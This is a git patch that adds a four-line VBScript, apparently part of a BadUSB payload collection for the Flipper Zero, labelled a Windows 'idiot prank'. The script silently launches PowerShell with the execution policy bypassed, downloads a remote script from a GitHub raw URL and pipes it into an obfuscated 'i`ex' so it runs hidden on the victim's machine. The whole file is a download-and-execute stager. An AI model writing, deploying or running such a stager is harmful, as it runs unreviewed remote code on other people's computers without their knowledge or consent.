From 0652875ec06c2fbb6cf5cda2c5c2b47a8c4aa508 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Thu, 30 May 2024 21:26:27 +0000 Subject: [PATCH] Add files via upload --- Windows-Idiot-Prank/idiot.vbs | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 Windows-Idiot-Prank/idiot.vbs diff --git a/Windows-Idiot-Prank/idiot.vbs b/Windows-Idiot-Prank/idiot.vbs new file mode 100644 index 0000000..4a32dbf --- /dev/null +++ b/Windows-Idiot-Prank/idiot.vbs @@ -0,0 +1,4 @@ +Set WshShell = WScript.CreateObject("WScript.Shell") +WScript.Sleep 200 +WshShell.Run "powershell.exe -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Windows-Idiot-Prank/main.ps1 | i`ex", 0, True +